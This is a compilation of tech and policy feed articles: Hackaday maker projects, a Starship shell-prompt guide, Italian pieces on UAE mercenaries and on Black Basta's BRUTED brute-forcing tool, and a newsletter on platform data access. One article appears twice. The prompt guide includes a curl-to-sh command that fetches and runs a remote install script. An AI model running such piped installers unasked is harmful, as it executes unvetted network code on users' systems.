The Tilt-A-Sketch was built by [devitoal] as part of an art display which allows the visitors to create their own art. Housed in a laser-cut wooden enclosure the toy does a faithful job of recreating the original. Perhaps unsurprisingly, the Etch A Sketch is a popular platform for various projects that we’ve seen before including original toys modified with robotics to create the artwork and electronic recreations that use LED displays instead in a way similar to this project.
youtube.com/embed/KoSKXEI5jus?…
Solar Power, Logically
We’ve all seen the ads. Some offer “free” solar panels. Others promise nearly free energy if you just purchase a solar — well, solar system doesn’t sound right — maybe… solar energy setup. Many of these plans are dubious at best. You pay for someone to mount solar panels on your house and then pay them for the electricity they generate at — presumably — a lower cost than your usual source of electricity. But what about just doing your own set up? Is it worth it? We can’t answer that, but [Brian Potter] can help you answer it for yourself.
In a recent post, he talks about the rise of solar power and how it is becoming a large part of the power generation landscape. Interestingly, he presents graphs of things like the cost per watt of solar panels adjusted for 2023 dollars. In 1975, a watt cost over $100. These days it is about $0.30. So the price isn’t what slows solar adoption.
The biggest problem is the intermittent nature of solar. But how bad is that really? It depends. If you can sell power back to the grid when you have it to spare and then buy it back later, that might make sense. But it is more effective to store what you make for your own use.
That, however, complicates things. If you really want to go off the grid, you need enough capacity to address your peak demand and enough storage to meet demand over several days to account for overcast days, for example.
There’s more to it than just that. Read the post for more details. But even if you don’t want solar, if you enjoy seeing data-driven analysis, there is plenty to like here.
Building an effective solar power system is within reach of nearly anyone these days. Some of the problems with solar go away when you put the cells in orbit. Of course, that always raises new problems.
Backyard Rope Tow from Spare Parts
A few years ago, [Jeremy Makes Things] built a rope tow in his back yard so his son could ski after school. Since the lifts at the local hill closed shortly after schools let out, this was the only practical way for his son to get a few laps in during the week. It’s cobbled together from things that [Jeremy] had around the house, and since the original build it’s sat outside for a few years without much use. There’s been a lot more snow where he lives this year though, so it’s time for a rebuild.
The power source for the rope tow is an old gas-powered snowblower motor, with a set of rollers and pulleys for the rope made out of the back end of a razor scooter. Some polyurethane was poured around the old wheel hub so that the rope would have something to grip onto. The motor needed some sprucing up as well, from carburetor adjustment, fuel tank repairs, and some other pieces of maintenance before it could run again. With that out of the way it could be hoisted back up a tree at the top of the hill and connected to the long rope.
This isn’t the first time [Jeremy] has had to perform major maintenance on this machine either. Three years ago it needed plenty of work especially around the polyurethane wheel where [Jeremy] also had to machine a new wheel bearing in addition to all the other work that had to go into repairing it that time. From the looks of things though it’s a big hit with his son who zips right back up the hill after each ski run. Getting to the tops of ski runs with minimal effort has been a challenge of skiers and snowboarders alike for as long as the sport has been around, and we’ve seen all kinds of unique solutions to that problem over the years.
Laser Harp Sets the Tone
In many ways, living here in the future is quite exiting. We have access to the world’s information instantaneously and can get plenty of exciting tools and hardware delivered to our homes in ways that people in the past with only a Sears catalog could only dream of. Lasers are of course among the exciting hardware available, which can be purchased with extremely high power levels. Provided the proper safety precautions are taken, that can lead to some interesting builds like this laser harp which uses a 3W laser for its strings.
[Cybercraftics]’ musical instrument is using a single laser to generate seven harp strings, using a fast stepper motor to rotate a mirror to precise locations, generating the effect via persistence of vision. Although he originally planned to use one Arduino for this project, the precise timing needed to keep the strings in the right place was getting corrupted by adding MIDI and the other musical parts to the project, so he split those out to a second Arduino.
Although his first prototype worked, he did have to experiment with the sensors used to detect his hand position on the instrument quite a bit before getting good results. This is where the higher power laser came into play, as the lower-powered ones weren’t quite bright enough. He also uses a pair of white gloves which help illuminate a blocked laser. With most of the issues ironed out, [Cybercraftics] notes that there’s room for improvement but still has a working instrument that seems like a blast to play. If you’re still stuck in the past without easy access to lasers, though, it’s worth noting that there are plenty of other ways to build futuristic instruments as well.
youtube.com/embed/c5HmCTt6hQ4?…
Contro i pirati e i cybercriminali gli Emirati mettono in campo i nuovi mercenari
Gli Emirati Arabi Uniti (EAU) costituiscono un caso unico nell’impiego dei mercenari, differenziandosi dalle esperienze in Angola, Sierra Leone e Nigeria sia per le motivazioni che per le modalità di utilizzo. Mentre in Africa il ricorso ai mercenari è spesso stato legato alla sopravvivenza di regimi fragili in contesti segnati da instabilità e conflitti interni, gli Emirati si distinguono per la loro stabilità politica e per la ricchezza derivante dal petrolio. Tuttavia, il Paese soffre di una carenza cronica di manodopera e competenze tecnologiche, soprattutto in ambito militare. Questa situazione ha spinto il Governo a utilizzare mercenari per colmare tali lacune, senza subire le stesse critiche internazionali che hanno colpito i Paesi africani. Ciò è attribuibile al peso geopolitico degli Emirati, le cui riserve petrolifere e ricchezze spingono le potenze occidentali a essere più prudenti nell’esprimere condanne, riservando critiche più severe a Stati più fragili e meno influenti.
Due approcci: sicurezza interna e politica estera
L’uso dei mercenari da parte degli Emirati si articola in due principali direttrici. La prima riguarda il rafforzamento della sicurezza interna, attraverso il supporto alle strutture che proteggono il regime. In particolare, i mercenari sono stati determinanti nella supervisione e creazione della Guardia Presidenziale, un corpo d’élite progettato per salvaguardare la leadership emiratina da eventuali colpi di Stato o minacce interne, spesso attribuite all’Iran. Questo utilizzo consente al Governo di affrontare in modo proattivo la sovversione interna e di consolidare la stabilità politica.
La seconda direttrice si riferisce al ruolo dei mercenari nella proiezione del potere emiratino oltre i confini nazionali, sfruttandoli come strumenti militari per perseguire obiettivi di politica estera. Gli Emirati, per esempio, sostengono Khalīfa Haftar e il suo Esercito Nazionale Libico attraverso finanziamenti e il dispiegamento del Gruppo Wagner. In Yemen, il coinvolgimento dei mercenari è stato altrettanto significativo: gli Emirati hanno utilizzato contractor per affiancare le loro truppe nella guerra contro gli Huthi, un conflitto condotto con il supporto di alleanze tribali locali. Per ridurre l’onere sulle proprie forze armate, gli Emirati hanno schierato circa 450 contractor latinoamericani su un totale di 1.800 uomini di stanza nella base di Abu Dhabi. Questo approccio riflette la volontà di un Governo determinato a difendere i propri interessi senza coinvolgere direttamente i propri cittadini nelle operazioni belliche.
I vantaggi della negabilità plausibile: il caso della Somalia
Un esempio emblematico di questa strategia è rappresentato dall’operazione anti-pirateria condotta nel Puntland, una regione somala. Gli Emirati, attraverso una sussidiaria della Reflex Ltd, una società originariamente legata a Erik Prince, finanziarono la Puntland Maritime Police Force (PMPF). Questa unità, composta da ex mercenari sudafricani e contractor locali, era incaricata di contrastare le attività dei pirati lungo le coste somale settentrionali. Equipaggiata con elicotteri, motoscafi e mezzi corazzati, la PMPF operava con un livello di aggressività superiore a quello tipico delle forze governative. Sebbene non sia confermato che abbia ingaggiato i pirati in scontri diretti, l’unità si è distinta per l’uso di forza letale in operazioni offensive, piuttosto che difensive.
Le Nazioni Unite hanno espresso preoccupazioni riguardo all’utilizzo dei mercenari sudafricani e ai metodi di addestramento della PMPF, ma gli Emirati hanno rivendicato il successo dell’operazione, che ha temporaneamente ridotto la minaccia della pirateria per le spedizioni internazionali. Tuttavia, quando la missione è divenuta di pubblico dominio, il Governo emiratino ha rapidamente chiuso il programma per evitare danni alla propria immagine internazionale, abbandonando la possibilità di sfruttare ulteriormente la negabilità plausibile.
Mercenari cibernetici: la strategia degli Emirati
Gli Emirati hanno anche investito massicciamente nel settore della cybersicurezza, utilizzando mercenari cibernetici per ampliare la propria influenza. Attraverso Darkmatter, una potente società locale, il Paese ha avviato operazioni mirate a rafforzare il controllo digitale sia a livello nazionale che internazionale. Un esempio significativo è il Project Rave, un programma che ha reclutato decine di ex agenti dell’intelligence americana per condurre operazioni di sorveglianza contro Governi stranieri, militanti e attivisti per i diritti umani.
Queste attività hanno generato tensioni con Paesi vicini come il Qatar, che ha accusato gli Emirati di aver hackerato agenzie di stampa e canali social ufficiali, riaprendo un’annosa faida tra le monarchie del Golfo. L’uso di contractor con competenze avanzate nel campo della cybersicurezza riflette l’importanza crescente di questa dimensione per un Paese piccolo come gli Emirati, che utilizza strumenti non convenzionali per competere in un’arena geopolitica sempre più complessa.
Chi è il mercenario del XXI secolo
Il ricorso ai mercenari da parte degli Emirati pone una domanda fondamentale: come definire il mercenario moderno? Gli esempi di EO in Angola e Sierra Leone, di STTEP in Nigeria e delle operazioni emiratine dimostrano che i mercenari, singoli o affiliati a società, sono strumenti geostrategici sempre più rilevanti. Questi attori operano senza legami con il loro Stato di origine, offrendo servizi di sicurezza offensiva e difensiva a governi che vogliono rafforzare il proprio potere senza implicazioni dirette.
Tuttavia, la legittimità di queste operazioni è spesso contestata. Gli Stati Uniti e il Regno Unito, per esempio, tendono a distinguere tra “contractor militari”, considerati legittimi, e “mercenari”, una categoria demonizzata per ragioni politiche. Questo doppio standard riflette l’interesse delle grandi potenze nel mantenere il controllo sulle dinamiche di sicurezza internazionale, proteggendo i propri interessi e delegittimando gli attori indipendenti.
Gli Emirati Arabi Uniti rappresentano un esempio lampante di come i piccoli Stati ricchi di risorse possano sfruttare i mercenari per espandere la propria influenza, sia a livello regionale che internazionale. Tuttavia, il ricorso a queste forze evidenzia anche un doppio standard nelle reazioni globali. Mentre i Paesi fragili che dipendono dai mercenari sono soggetti a severe critiche, gli Stati ricchi come gli Emirati ricevono un trattamento più indulgente, complice la loro importanza strategica.
Questa asimmetria riflette una dinamica geopolitica in cui le società mercenarie indipendenti hanno il potenziale di alterare profondamente lo status quo, soprattutto in regioni come l’Africa e il Medio Oriente. Sebbene l’uso dei mercenari sia visto come una soluzione pragmatica da parte di molti governi, esso solleva questioni etiche e politiche che rischiano di amplificare le tensioni internazionali e di alimentare nuove forme di neocolonialismo mascherato.
L'articolo Contro i pirati e i cybercriminali gli Emirati mettono in campo i nuovi mercenari proviene da InsideOver.
Three SPI Busses Are One Too Many on This Cheap Yellow Display
The Cheap Yellow Display may not be the fastest of ESP32 boards with its older model chip and 4 MB of memory, but its low price and useful array of on-board peripherals has made it something of a hit in our community. Getting the most out of the hardware still presents some pitfalls though, as [Mark Stevens] found out when using one for an environmental data logger. The problem was that display, touch sensor, and SD card had different SPI busses, of which the software would only recognise two. His solution involves a simple hardware mod, which may benefit many others doing similar work.
It’s simple enough, put the LCD and SD card on the same bus, retaining their individual chip select lines. There’s a track to be cut and a bit of wiring to be done, but nothing that should tax most readers too much. We’re pleased to see more work being done with this board, as it remains a promising platform, and any further advancements for it are a good thing. If you’re interested in giving it a go, then we’ve got some inspiration for you.
Linux Fu: A Warp Speed Prompt
If you spend a lot of time at the command line, you probably have either a very basic prompt or a complex, information-dense prompt. If you are in the former camp, or you just want to improve your shell prompt, have a look at Starship. It works on the most common shells on most operating systems, so you can use it everywhere you go, within reason. It has the advantage of being fast and you can also customize it all that you want.
What Does It Look Like?
It is hard to explain exactly what the Starship prompt looks like. First, you can customize it almost infinitely, so there’s that. Second, it adapts depending on where you are. So, for example, in a git-controlled directory, you get info about the git status unless you’ve turned that off. If you are in an ssh session, you’ll see different info than if you are logged in locally.
However, here’s a little animation from their site that will give you an idea of what you might expect:
hackaday.com/wp-content/upload…
Installation
The web site says you need a Nerd Font in your terminal. I didn’t remember doing that on purpose, but apparently I had one already.
Next, you just have to install using one of the methods they provide, which depends on your operating system. For Linux, you can run the installer:
curl -sS starship.rs/install.sh | sh
Sure, you should download it first and look to make sure it won’t reformat your hard drive or something, but it was fine when we did it.
Finally, you have to run an init command. How you do that depends on your shell and they have plenty of examples. There’s even a way to use it with cmd.exe on Windows!
Customization
The default isn’t bad but, of course, you are going to want to change things. Oddly, the system doesn’t create a default configuration file. It just behaves a certain way if it doesn’t find one. You must make your own ~/.config/starship.toml file. You can change where the file lives using an environment variable, if you prefer, but you still have to create it.
The TOML file format has sections like an INI file. Just be aware that any global options have to come before any section (that is, there’s no [global] tag). If you put things towards the bottom of the file, they won’t seem to work and it is because they have become part of the last tag.
There are a number of modules and each module reads data from a different section. For example, on my desktop I have no need for battery status so:
[battery]disabled = true
Strings
In the TOML file you can use single or double quotes. You can also triple a quote to make a string break lines (but the line breaks are not part of the string). The single quotes are treated as a literal, while double quotes require escape characters for special things.
You can use variables in strings like $version or $git_branch. You can also place part of a string in brackets and then formating for the string in parenthesis immediately following. For example:
'[off](fg:red bold)'
Finally, you can have a variable print only if it exists:
'(#$id)'
If $id is empty, this does nothing. Otherwise, it will print the # and the value.
Globals and Modules
You can find all the configuration options — and there are many — in the Starship documentation. Of primary interest is the global format variable. This sets each module that is available. However, you can also use $all to get all the otherwise unspecified modules. By default, the format variable starts with $username $hostname. Suppose you wanted it to be different. You could write:
format='$hostname ! $username $all'
You’ll find many modules that show the programming language used for this directory, version numbers, and cloud information. You can shut things off, change formatting, or rearrange. Some user-submitted customizations are available, too. Can’t find a module to do what you want? No problem.
Super Custom
I wanted to show the status of my watercooler, so I created a custom section in the TOML file:
[custom.temp]
command = 'temp-status|grep temp|cut -d " " -f 7'
when = true
format='$output°'
The command output winds up in, obviously, $output. In this case, I always want the module to output and the format entry prints the output with a degree symbol after it. Easy!
Of Course, There are Always Others
There are other prompt helpers out there, especially if you use zsh (e.g., Oh My Zsh). However, if you aren’t on zsh, your options are more limited. Oh My Posh is another cross-shell entry into the field. Of course, you don’t absolutely need any of these. They work because shells give you variables like PS1 and PROMPT_COMMAND, so you can always roll your own to be as simple or complex as you like. People have been doing their own for a very long time.
If you want to do your own for bash, you can get some help online. Or, you could add help to bash, too.
Social media is a black box. Here's how to fix that
THIS IS A BONUS EDITION OF DIGITAL POLITICS. I'm Mark Scott, and I don't usually speak about my day job in this newsletter. But today, that changes.
One of my goals this year is to help open up social media platforms to greater outside transparency. To do that, I'm working on ways to jumpstart data access to these platforms, or efforts to allow independent researchers to delve into the public data that these firms collect on all of us.
It's not an easy task — especially because any form of such data access must protect people's privacy, at all cost, and uphold the highest levels of security.
But, for me, it's a fundamental step in filling the democratic deficit associated with how social media may (or may not) affect our everyday lives.
Below gives you a glimpse about what I've been up to in recent months. It's a cross-post from Tech Policy Press.
Let's get started.
What happens online doesn't just stay online
IT'S HARD TO REMEMBER A WORLD WITHOUT SOCIAL MEDIA. From the United States to Brazil, people now spend hours on TikTok, Instagram, and YouTube each day, and these platforms have become embedded in everything from how we talk to friends and family to how we elect our national leaders.
But one thing is clear: despite researchers’ efforts to decipher social media’s impact, if any, on countries’ democratic institutions, no one still has a clear understanding of how these global platforms work. What’s worse — we have less awareness about what happens on these platforms in 2025 than we did five years ago.
This is a problem.
It’s a problem for those who believe these tech companies censor people’s voices online. It’s a problem for those who believe these firms do not do enough to police their platforms for harmful content. And it’s a problem for democratic countries whose political systems are fracturing under increased polarization — some of which is amplified via social media.
In 2025, there is a fundamental disconnect between what happens on social media and what academics, independent researchers and regulators understand about these platforms.
That has led to a democratic deficit. No one can quantify the effect, if any, of these platforms’ impact on public discourse. It has also led to a policymaking void. Lawmakers worldwide don’t know what steps are needed via potential new legislation, voluntary standards or the doubling down on existing efforts to reduce online harm on social media while upholding individuals’ right to free speech.
In short, we just don’t know enough about social media’s impact on society.
Thanks for reading Digital Politics. If you've been forwarded this newsletter (and like what you've read), please sign up here. For those already subscribed, reach out on digitalpolitics@protonmail.com
Without quantifiable evidence of harm (or lack of it) — driven by independent outside access to platform data, or the ability for people to research the inner workings of these social media giants — there is no way to make effective online safety legislation, uphold people’s freedom of expression, and hold companies to account when, inevitably, things go wrong.
And yet, there is a way forward. One that relies on the protection of people’s privacy and free speech. One that limits government access to people’s social media posts. And one that gives outside researchers the ability to kick the tires on how these platforms operate by granting them access to public data in ways that improves society’s understanding of these social media giants.
What are we going to do about it?
To meet this need, Columbia World Projects at Columbia University and the Hertie School’s Centre for Digital Governance have been running workshops with one aim in mind: How to build on emerging online safety regimes worldwide — some of which allow, or will soon allow, for such mandatory data access from the platforms to outside groups — to fill this democratic deficit.
With support from the Knight Foundation, that has involved bringing together groups of academic and civil society researchers, data infrastructure providers and national regulators for regular meetings to hash out what public and private funding is required to turn such data access from theory into reality.
The initial work has focused on the European Union’s Digital Services Act, which includes specific mandatory requirements for outsiders to delve into platform data.
But as other countries bring online similar data access regimes, the hope is to provide a route for others to follow that will build greater capacity for researchers to conduct this much-needed work; support regulators in navigating the inherent difficulties in opening up such platforms’ public data to outsiders; and ensure that people’s social media data is protected and secured, at all cost, from harm and surveillance.
As with all research, much relies on funding. Just because a country’s online safety laws dictate that outsiders can access social media data does not mean that researchers can just flick on a switch and get to work.
At every turn, there’s a need for greater public and private backing.
As part of the ongoing workshops, the discussions have focused on four areas where we believe targeted funding support from a variety of public and private donors can make the most impact. Taken together, it represents an essential investment in our wider understanding of social media that will ensure companies uphold their stated commitments to make their platforms accountable and transparent to outside scrutiny.
Four ways to make social media giants more accountable
The first component is the underlying infrastructure needed to carry out this work. Currently, accessing social media data is confined to the few, not the many. Researchers either need existing relationships with platforms or access to large funding pots to pay for cloud storage, technical analysis tools and other data access techniques that remain off limits to almost everyone.
Currently, there is a cottage industry of data providers — some commercial, others nonprofit — that provide the baseline infrastructure, in terms of access to platforms, analytics tooling and user-friendly research interfaces. Yet to meet researchers’ needs, as well as the growing regulatory push to open up social media giants to greater scrutiny, more needs to be done to make such infrastructure readily accessible, particularly to experts in Global Majority countries.
That includes scaling existing data infrastructure, making analytical tools more universally available to researchers, and using a variety of techniques — from using Application Programming Interfaces, or APIs, that plug directly into platform data to allowing researchers to scrape social media sites in the public interest to promoting “data donations” directly from users themselves — to meet different research needs.
The second focus has been on the relationships between researchers and regulators. As more countries pursue online safety legislation, there is a growing gap between in-house regulatory capacity and outsider expertise that needs to be closed for these regimes to operate effectively. Yet currently, few, if any, formal structures exist for researchers and regulators to share best practices — all while maintaining a safe distance via so-called “Chinese Walls” between government oversight and researcher independence.
What is needed are more formal information-sharing opportunities between regulators and researchers so that online safety regimes are based on quantifiable evidence — often derived from outside data access to social media platforms. That may include regular paid-for secondments for researchers to embed inside regulators to share their knowledge; the development of routine capacity building and information sharing to understand the evolving research landscape; and a shift away from informal networks between some researchers and regulators into a more transparent system that is open to all.
Sign up for Digital Politics
Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.
Subscribe
Email sent! Check your inbox to complete your signup.
No spam. Unsubscribe anytime.
For that to work, a third element is needed in terms of greater capacity building — in the form of technical assistance, data protection and security training and researcher community engagement. Currently, outside experts have varying levels of technical understanding, policy expertise and knowledge of privacy standards that hamstring greater accountability and transparency for platforms. If people’s public social media data is not secured and protected against harm, for instance, then companies will rightly restrict access to safeguard their users from Cambridge Analytica-style leakages of information.
What is needed is the expansion of existing research networks so that data access best practices can be shared with as many groups as possible. Technical support to maintain the highest data protection standards — in the form of regular training of researchers and the development of world-leading privacy protocols for all to use — similarly will provide greater legal certainty for social media users. The regular convening of researchers so that people can learn from each other about the most effective, and secure, way to conduct such research will also democratize current data access that has often been limited to a small number of experts.
The fourth component of the workshops is the most important: how to maintain independence between outside researchers and regulators in charge of the growing number of online safety regimes worldwide. It is important for both sides to work effectively with each other. But neither researchers nor regulators should become beholden — or perceived to be beholden — to each other. Independence for regulators to conduct their oversight and for researchers to criticize these agencies is a fundamental part of how democracies function.
That will require forms of public-private funding to support ongoing data access work to create strict safeguards between researchers and regulators. That’s a tricky balance between supporting close ties between officials and outsiders, while similarly ensuring that neither side feels subordinate to the other. To meet that balance, a mixture of hands-off public support and non-government funding will be critical.
Such structures already exist in other industries, most notably in the medical research field. They represent a clear opportunity to learn from others as outside researchers and regulators push for greater accountability and transparency for social media companies.
Chemistry Meets Mechatronics in This Engaging Art Piece
There’s a classic grade school science experiment that involves extracting juice from red cabbage leaves and using it as a pH indicator. It relies on anthocyanins, pigmented compounds that give the cabbage its vibrant color but can change depending on the acidity of the environment they’re in, from pink in acidic conditions to green at higher pH. And anthocyanins are exactly what power this unusual kinetic art piece.
Even before it goes into action, [Nathalie Gebert]’s Anthofluid is pretty cool to look at. The “canvas” of the piece is a thin chamber formed by plexiglass sheets, one of which is perforated by an array of electrodes. A quartet of peristaltic pumps fills the chamber with a solution of red cabbage juice from a large reservoir, itself a mesmerizing process as the purple fluid meanders between the walls of the chamber and snakes around and between the electrodes. Once the chamber is full, an X-Y gantry behind the rear wall moves to a random set of electrodes, deploying a pair of conductors to complete the circuit. When a current is applied, tendrils of green and red appear, not by a pH change but rather by the oxidation and reduction reactions occurring at the positive and negative electrodes. The colors gently waft up through the pale purple solution before fading away into nothingness. Check out the video below for the very cool results.
We find Anthofluid terribly creative, especially in the use of such an unusual medium as red cabbage juice. We also appreciate the collision of chemistry, electricity, and mechatronics to make a piece of art that’s so kinetic but also so relaxing at the same time. It’s the same feeling that [Nathalie]’s previous art piece gave us as it created images on screens of moving thread.
youtube.com/embed/sC4Rg1wRP68?…
PiEEG Kit is a Self-Contained Biosignal Laboratory
Back in 2023, we first brought you word of the PiEEG: a low-cost Raspberry Pi based device designed for detecting and analyzing electroencephalogram (EEG) and other biosignals for the purposes of experimenting with brain-computer interfaces. Developed by [Ildar Rakhmatulin], the hardware has gone through several revisions since then, with this latest incarnation promising to be the most versatile and complete take on the concept yet.
For the new PiEEG Kit, the hardware is now enclosed in its own ABS carrying case, which includes an LCD right in the lid. While you’ve still got to provide your own power (such as a USB battery bank), having the on-board display removes the need to connect the Pi to some other system to visualize the data. There’s also a new PCB that allows the connection of additional environmental sensors, breakouts for I2C, SPI, and GPIO, three buttons for user interaction, and an interface for connecting the electrodes that indicates where they should be placed on the body right on the silkscreen.
The crowdsourcing campaign for the PiEEG Kit is set to begin shortly, and the earlier PiEEG-16 hardware is available for purchase currently if you don’t need the fancy new features. Given the fact that the original PiEEG was funded beyond 500% during its campaign in 2023, we imagine there’s going to be plenty of interest in the latest-and-greatest version of this fascinating project.
youtube.com/embed/vVgMHCaZgIQ?…
PiEEG Kit is a Self-Contained Biosignal Labratory
Back in 2023, we first brought you word of the PiEEG: a low-cost Raspberry Pi based device designed for detecting and analyzing electroencephalogram (EEG) and other biosignals for the purposes of experimenting with brain-computer interfaces. Developed by [Ildar Rakhmatulin], the hardware has gone through several revisions since then, with this latest incarnation promising to be the most versatile and complete take on the concept yet.
For the new PiEEG Kit, the hardware is now enclosed in its own ABS carrying case, which includes an LCD right in the lid. While you’ve still got to provide your own power (such as a USB battery bank), having the on-board display removes the need to connect the Pi to some other system to visualize the data. There’s also a new PCB that allows the connection of additional environmental sensors, breakouts for I2C, SPI, and GPIO, three buttons for user interaction, and an interface for connecting the electrodes that indicates where they should be placed on the body right on the silkscreen.
The crowdsourcing campaign for the PiEEG Kit is set to begin shortly, and the earlier PiEEG-16 hardware is available for purchase currently if you don’t need the fancy new features. Given the fact that the original PiEEG was funded beyond 500% during its campaign in 2023, we imagine there’s going to be plenty of interest in the latest-and-greatest version of this fascinating project.
youtube.com/embed/vVgMHCaZgIQ?…
BRUTED: Il Tool di Black Basta che Apre le Porte ai Ransomware
Nel contesto della cybersecurity, l’evoluzione delle minacce legate ai ransomware continua a rappresentare una delle sfide più complesse per le aziende e gli esperti di sicurezza. Uno dei gruppi più attivi e pericolosi del panorama attuale è Black Basta, che dal 2022 ha affermato la sua presenza nel settore del crimine informatico attraverso attacchi mirati a infrastrutture aziendali critiche. La sua peculiarità non risiede solo nell’uso del modello Ransomware-as-a-Service (RaaS), ma anche nell’adozione di strumenti sofisticati per il compromissione iniziale dei sistemi bersaglio.
Uno di questi strumenti è BRUTED, un framework automatizzato di brute forcing e credential stuffing, progettato per compromettere dispositivi di rete periferici esposti su Internet, come firewall, VPN e altri servizi di accesso remoto. La sua efficienza e capacità di adattamento lo rendono un’arma particolarmente insidiosa nelle mani di cybercriminali esperti.
Questa analisi approfondisce il funzionamento di BRUTED, il modus operandi di Black Basta e le implicazioni per la sicurezza informatica.
Black Basta: Un’Organizzazione Cybercriminale in Crescita
Black Basta si è imposto come uno dei gruppi ransomware più attivi e letali degli ultimi anni. Operando come Ransomware-as-a-Service (RaaS), offre agli affiliati strumenti per eseguire attacchi altamente mirati, condividendo con essi una parte dei profitti derivanti dai riscatti. Le principali caratteristiche della loro strategia includono:
- Doppia Estorsione: Dopo aver criptato i dati della vittima, il gruppo minaccia la pubblicazione delle informazioni rubate, aumentando la pressione per ottenere il pagamento.
- Targetizzazione di Settori Critici: I settori più colpiti dagli attacchi di Black Basta includono:
- Servizi aziendali (Business Services), per il loro elevato valore commerciale.
- Industria manifatturiera (Manufacturing), dove l’interruzione operativa può causare perdite economiche enormi.
- Infrastrutture critiche, spesso caratterizzate da scarsa resilienza agli attacchi cyber.
- Utilizzo di strumenti avanzati come Cobalt Strike, Brute Ratel e, più recentemente, BRUTED, per massimizzare l’efficacia degli attacchi.
L’introduzione di BRUTED ha permesso a Black Basta di automatizzare e scalare gli attacchi di accesso iniziale, rendendo ancora più difficile per le aziende difendersi.
BRUTED: Come Funziona e Quali Sono i Suoi Obiettivi?
BRUTED è un framework di attacco altamente avanzato che automatizza il processo di brute forcing e credential stuffing. Il suo scopo principale è quello di individuare dispositivi di rete vulnerabili e ottenere l’accesso iniziale ai sistemi aziendali.
Le sue principali funzionalità includono:
- Scansione automatizzata di Internet per identificare dispositivi esposti e potenzialmente vulnerabili.
- Tentativi di accesso tramite brute force sfruttando database di credenziali rubate o deboli.
- Adattabilità multi-vendor, con supporto specifico per diversi tipi di firewall, VPN e gateway di accesso remoto.
- Persistenza e movimento laterale, facilitando l’accesso ai sistemi interni una volta compromesso il perimetro di sicurezza.
Una volta ottenuto l’accesso iniziale, gli attaccanti sfruttano il framework per:
- Compromettere dispositivi chiave come firewall e VPN.
- Eseguire movimenti laterali all’interno della rete per ottenere privilegi più elevati.
- Distribuire il ransomware Black Basta, crittografando sistemi critici e bloccando l’operatività aziendale.
BRUTED rappresenta quindi un passo in avanti nell’automazione degli attacchi, permettendo agli affiliati di Black Basta di operare con maggiore efficienza e su scala più ampia.
Analisi della Mappa di Attacco: Una Visione Dettagliata
L’immagine allegata fornisce una rappresentazione grafica estremamente dettagliata dell’infrastruttura di attacco basata su BRUTED e utilizzata da Black Basta. Analizzandola, emergono diversi livelli chiave dell’operazione:
1. Origine dell’Attacco (Lato Sinistro)
- Connessioni con la Russia: L’immagine suggerisce un legame con attori malevoli operanti dalla Federazione Russa.
- Settori maggiormente colpiti: Business Services e Manufacturing risultano tra i principali obiettivi.
- Strumenti di attacco: Oltre a BRUTED, vengono utilizzati strumenti di post-exploitation come Cobalt Strike e Brute Ratel.
2. Host Compromessi e Tecniche di Attacco (Centro)
- Il cluster centrale dell’immagine mostra un insieme di dispositivi esposti su Internet.
- Ogni nodo rappresenta un host vulnerabile, probabilmente identificato tramite scansioni automatizzate.
- Le connessioni tra i nodi indicano attacchi mirati, con utilizzo di brute force e credential stuffing su larga scala.
3. Indicatori di Compromissione (Lato Destro)
- L’elenco di domini e IP compromessi mostra le infrastrutture usate da Black Basta per il comando e controllo (C2).
- I colori distinti rappresentano il livello di criticità e l’associazione con specifici attacchi.
- IP e DNS evidenziati in rosso corrispondono a infrastrutture attualmente attive e pericolose.
Questa analisi grafica fornisce un quadro chiaro delle tecniche di attacco e permette agli esperti di cybersecurity di identificare gli indicatori chiave di compromissione (IoC).
Come Difendersi da BRUTED e Black Basta
Per mitigare il rischio di compromissione da parte di BRUTED e Black Basta, le aziende devono adottare strategie di sicurezza avanzate, tra cui:
- Protezione degli Endpoint di Rete:
- Bloccare l’accesso remoto non necessario.
- Configurare firewall per limitare accessi sospetti.
- Gestione Sicura delle Credenziali:
- Forzare l’uso dell’autenticazione multi-fattore (MFA).
- Evitare il riutilizzo di password deboli.
- Monitoraggio Attivo degli Indicatori di Compromissione:
- Aggiornare costantemente le blacklist di IP e domini malevoli.
- Analizzare tentativi di accesso anomali e bloccare gli indirizzi sospetti.
- Patch Management:
- Mantenere aggiornati firmware e software di firewall e VPN.
- Applicare patch di sicurezza contro vulnerabilità note.
L’integrazione di BRUTED nel modello di attacco di Black Basta rappresenta un’evoluzione nella criminalità informatica, aumentando la velocità e la scalabilità degli attacchi. Le aziende devono adottare misure proattive e strategie difensive solide per contrastare questa minaccia in crescita.
Un approccio basato su zero-trust, MFA e monitoraggio attivo è fondamentale per difendersi efficacemente da queste minacce in continua evoluzione.
L'articolo BRUTED: Il Tool di Black Basta che Apre le Porte ai Ransomware proviene da il blog della sicurezza informatica.
World’s Smallest Blinky, Now Even Smaller
Here at Hackaday, it’s a pretty safe bet that putting “World’s smallest” in the title of an article will instantly attract comments claiming that someone else built a far smaller version of the same thing. But that’s OK, because if there’s something smaller than this nearly microscopic LED blinky build, we definitely want to know about it.
The reason behind [Mike Roller]’s build is simple: he wanted to build something smaller than the previous smallest blinky. The 3.2-mm x 2.5-mm footprint of that effort is a tough act to follow, but technology has advanced somewhat in the last seven years, and [Mike] took advantage of that by basing his design on an ATtiny20 microcontroller in a WLCSP package and an 0201 LED, along with a current-limiting resistor and a decoupling capacitor. Powering the project is a 220-μF tantalum capacitor, which at a relatively whopping 3.2 mm x 1.6 mm determines the size of the PCB, which [Mike] insisted on using.
Assembling the project was challenging, to say the least. [Mike] originally tried a laboratory hot plate to reflow the board, but when the magnetic stirrer played havoc with the parts, he switched to a hot-air rework station with a very low airflow. Programming the microcontroller almost seemed like it was more of a challenge; when the pogo pins he was planning to use proved too large for the job he tacked leads made from 38-gauge magnet wire to the board with the aid of a micro hot air tool.
After building version one, [Mike] realized that even smaller components were available, so there’s now a 2.4 mm x 1.5 mm version using an 01005 LED. We suspect there’ll be a version 3.0 soon, though — he mentions that the new TI ultra-small microcontrollers weren’t available yet when he pulled this off, and no doubt he’ll want to take a stab at this again.
Pick Up A Pebble Again
A decade ago, smartwatches were an unexplored avenue full of exotic promise. There were bleeding-edge and eye-wateringly expensive platforms from the likes of Samsung or Apple, but for the more experimental among technophiles there was the Pebble. Based on a microcontroller and with a relatively low-resolution display, it was the subject of a successful crowdfunding campaign and became quite the thing to have. Now long gone, it has survived in open-source form, and now if you’re a Pebble die-hard you can even buy a new Pebble. We’re not sure about their choice of name though, we think calling something the “Core 2 Duo” might attract the attention of Intel’s lawyers.
